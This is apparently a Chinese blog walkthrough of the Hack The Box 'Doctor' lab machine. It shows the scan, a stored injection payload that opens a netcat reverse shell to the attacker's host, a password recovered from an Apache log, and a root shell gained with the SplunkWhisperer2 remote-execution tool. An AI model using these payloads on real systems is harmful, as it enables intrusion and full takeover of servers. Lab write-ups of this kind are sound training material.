Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-doctor

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 7.2k 阅读时长 ≈ 7 分钟

0x00简述

0x01.信息收集

可以看到开放了22/80/8089端口,8089对应的服务为splunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@JIYE:~/htb/doctor# nmap -sC -sV -sT 10.10.10.209 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-18 03:21 EDT
Nmap scan report for 10.10.10.209
Host is up (0.35s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.68 seconds
root@JIYE:~/htb/doctor#

0x02.先访问80端口

同样的配方同样的味道,添加一条hosts [doctors.htb 10.10.10.209]

0x03.访问doctors.htb

1.尝试简单注入,可是没有。

2.注册用户

3.登入

4.手动爬虫

发现而已提交留言,感觉到存储型XSS的味道。。。

5.构建XSS代码反弹shell

1
<img src=http://10.10.17.216/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.17.216'$IFS'6666')>

kali先监听6666

1
2
3
root@JIYE:~/htb/doctor# nc -nvlp 6666
listening on [any] 6666 ...

提交

1
2
3
4
5
6
7
root@JIYE:~/htb/doctor# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.209] 38714
whoami
web
python3 -c 'import pty;pty.spawn("/bin/bash")'
web@doctor:~$

6.升级shell

1
2
3
4
5
6
7
8
9
web@doctor:~$ ^Z
[1]+  已停止               nc -nvlp 6666
root@JIYE:~/htb/doctor# stty raw -echo
root@JIYE:~/htb/doctor# nc -nvlp 6666

web@doctor:~$ 
web@doctor:~$ pwd
/home/web
web@doctor:~$

0x04.登入到shaun用户

1
2
3
4
5
6
7
8
9
web@doctor:~$ cd /home/
web@doctor:/home$ ls
shaun  web
web@doctor:/home$ cd shaun/
web@doctor:/home/shaun$ ls
user.txt
web@doctor:/home/shaun$ cat user.txt 
cat: user.txt: Permission denied
web@doctor:/home/shaun$

爬取文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
web@doctor:~/blog$ cd /var/www/html/ 
web@doctor:/var/www/html$ ls
about.html  contact.html  departments.html  images      js
blog.html   css           fonts             index.html  services.html
web@doctor:/var/www/html$ cd /var/lo
local/ lock/  log/   
web@doctor:/var/www/html$ cd /var/log/apache2/
web@doctor:/var/log/apache2$ ls
access.log        access.log.5.gz  error.log.10.gz  error.log.5.gz
access.log.1      access.log.6.gz  error.log.11.gz  error.log.6.gz
access.log.10.gz  access.log.7.gz  error.log.12.gz  error.log.7.gz
access.log.11.gz  access.log.8.gz  error.log.13.gz  error.log.8.gz
access.log.12.gz  access.log.9.gz  error.log.14.gz  error.log.9.gz
access.log.2.gz   backup           error.log.2.gz   other_vhosts_access.log
access.log.3.gz   error.log        error.log.3.gz
access.log.4.gz   error.log.1      error.log.4.gz
web@doctor:/var/log/apache2$ cat backup 
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "\x16\x03" 400 0 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "t3 12.1.2\n" 400 0 "-" "-"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "PROPFIND / HTTP/1.1" 405 521 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [05/Sep/2020:11:09:48 +0200] "GET /.git/HEAD HTTP/1.1" 404 453 "-" 
....

省略一大堆。。。

....
web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$

得到shaun密码[Guitar123],登入

1
2
3
4
5
6
7
8
9
10
11
web@doctor:/var/log/apache2$ su shaun
Password: 
shaun@doctor:/var/log/apache2$ whoami
shaun
shaun@doctor:/var/log/apache2$ 
shaun@doctor:/var/log/apache2$ cd
shaun@doctor:~$ ls
user.txt
shaun@doctor:~$ cat user.txt 
**************************************
shaun@doctor:~$

0x05.提权

1.shaun没有权限

1
2
3
4
shaun@doctor:/home/web$ sudo -l
[sudo] password for shaun: 
Sorry, user shaun may not run sudo on doctor.
shaun@doctor:/home/web$

什么是splunk

2.利用splunk提权地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@JIYE:~/htb/doctor# git clone https://github.com/cnotin/SplunkWhisperer2
正克隆到 'SplunkWhisperer2'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 55 (delta 1), reused 2 (delta 1), pack-reused 48
展开对象中: 100% (55/55), 20.68 KiB | 162.00 KiB/s, 完成.

root@JIYE:~/htb/doctor# ls
nmap.CVT  SplunkWhisperer2  user

root@JIYE:~/htb/doctor# cd SplunkWhisperer2/

root@JIYE:~/htb/doctor/SplunkWhisperer2# ls
LICENSE  PySplunkWhisperer2  README.md  SharpSplunkWhisperer2

root@JIYE:~/htb/doctor/SplunkWhisperer2# cd PySplunkWhisperer2/

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# ls
build_exe.bat  PySplunkWhisperer2_local.py  PySplunkWhisperer2_remote.py  README.md  requirements.txt

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# proxychains pip2 install -r requirements.txt 
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| ::1 
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: ::1 does not exist
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 1)) (2.22.0)
|DNS-request| pypi.org 
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<><>-OK
|DNS-response| pypi.org is 151.101.64.223
|S-chain|-<>-127.0.0.1:1080-<><>-151.101.64.223:443-<><>-OK
WARNING: You are using pip version 20.2.2; however, version 20.2.4 is available.
You should consider upgrading via the '/usr/bin/python2 -m pip install --upgrade pip' command.
root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# ls
build_exe.bat  PySplunkWhisperer2_local.py  PySplunkWhisperer2_remote.py  README.md  requirements.txt

root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# chmod +x PySplunkWhisperer2_remote.py 
root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2#

查看使用方法readme

3.kali先监听8888

1
2
3
root@JIYE:~# nc -nvlp 8888
listening on [any] 8888 ...

4.执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@JIYE:~/htb/doctor/SplunkWhisperer2/PySplunkWhisperer2# python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.17.216 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/bash '10.10.17.216' '8888''
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpo7c3zpu6.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.17.216:8181/
10.10.10.209 - - [18/Oct/2020 04:50:53] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup


5.得到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@JIYE:~# nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.209] 49402
whoami
root

pwd
/

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@doctor:/# cd
cd
bash: cd: HOME not set
root@doctor:/# ls
ls
bin    dev   lib    libx32      mnt   root  snap      sys  var
boot   etc   lib32  lost+found  opt   run   srv       tmp
cdrom  home  lib64  media       proc  sbin  swapfile  usr
root@doctor:/# ^Z       
[1]+  已停止               nc -nvlp 8888
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 8888

root@doctor:/# 
root@doctor:/# 
root@doctor:/# cd /root/
root@doctor:/root# ls
root.txt
root@doctor:/root# cat root.txt 
***********************************
root@doctor:/root#
-------------纸短情长下次再见-------------